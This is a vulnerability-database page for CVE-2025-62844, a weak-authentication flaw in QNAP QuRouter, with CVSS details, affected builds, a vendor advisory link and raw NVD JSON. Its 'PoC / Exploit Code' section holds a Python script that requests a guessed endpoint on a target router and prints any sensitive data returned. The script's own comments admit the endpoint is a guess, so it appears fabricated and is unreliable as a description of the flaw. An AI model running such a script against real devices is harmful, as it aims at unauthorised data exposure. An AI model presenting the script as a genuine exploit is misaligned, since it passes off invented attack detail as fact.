Security Vulnerability Report
CVE-2025-62844 CVSS 5.5 MEDIUM

Published: 2026-03-20 17:16:42
Last Modified: 2026-04-14 14:24:29

Description

A weak authentication vulnerability has been reported to affect QHora. If an attacker gains local network access, they can then exploit the vulnerability to gain sensitive information.

We have already fixed the vulnerability in the following version:
QuRouter 2.6.2.007 and later

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:qnap:qurouter:2.6.0.239:build_20250625:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:qnap:qurouter:2.6.0.688:build_20250818:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:qnap:qurouter:2.6.1.028:build_20251001:*:*:*:*:*:* - VULNERABLE
QuRouter < 2.6.2.007

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
PoC for CVE-2025-62844: QHora Weak Authentication
Description: Attempts to access sensitive configuration via weak auth on local network.
"""
import requests
import sys


def exploit(target_ip):
    # Example endpoint that might be vulnerable due to weak authentication
    # Adjust the endpoint/port based on actual technical analysis
    url = f"http://{target_ip}:8080/api/v1/internal/sensitive_config"
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "application/json"
    }

    print(f"[*] Attempting to exploit weak auth on {target_ip}...")
    try:
        # In a real weak auth scenario, we might send a request with low-priv creds
        # or no creds where the system incorrectly defaults to allowing access.
        response = requests.get(url, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Exploit successful! Sensitive information leaked:")
            print(response.text)
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print("[-] The target may be patched or not vulnerable.")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: python {sys.argv[0]} <target_ip>")
        sys.exit(1)
    exploit(sys.argv[1])

References

https://www.qnap.com/en/security-advisory/qsa-26-12 - Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62844", "sourceIdentifier": "[email protected]", "published": "2026-03-20T17:16:42.387", "lastModified": "2026-04-14T14:24:28.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weak authentication vulnerability has been reported to affect QHora. If an attacker gains local network access, they can then exploit the vulnerability to gain sensitive information.\n\nWe have already fixed the vulnerability in the following version:\nQuRouter 2.6.2.007 and later"}, {"lang": "es", "value": "Se ha reportado una vulnerabilidad de autenticación débil que afecta a QHora. Si un atacante obtiene acceso a la red local, puede entonces explotar la vulnerabilidad para obtener información sensible.\n\nYa hemos corregido la vulnerabilidad en la siguiente versión:\nQuRouter 2.6.2.007 y posteriores"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", 
"modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1390"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qurouter:2.6.0.239:build_20250625:*:*:*:*:*:*", "matchCriteriaId": "6BEA7459-EA28-4A5F-ABB4-F00661760FA4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qurouter:2.6.0.688:build_20250818:*:*:*:*:*:*", "matchCriteriaId": "71BB01EA-6A7B-46CF-A2F7-41DDBA5A17ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:qnap:qurouter:2.6.1.028:build_20251001:*:*:*:*:*:*", "matchCriteriaId": "F61A82A3-3A3E-42B6-B7F6-B5FAF37CCC80"}]}]}], "references": [{"url": "https://www.qnap.com/en/security-advisory/qsa-26-12", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}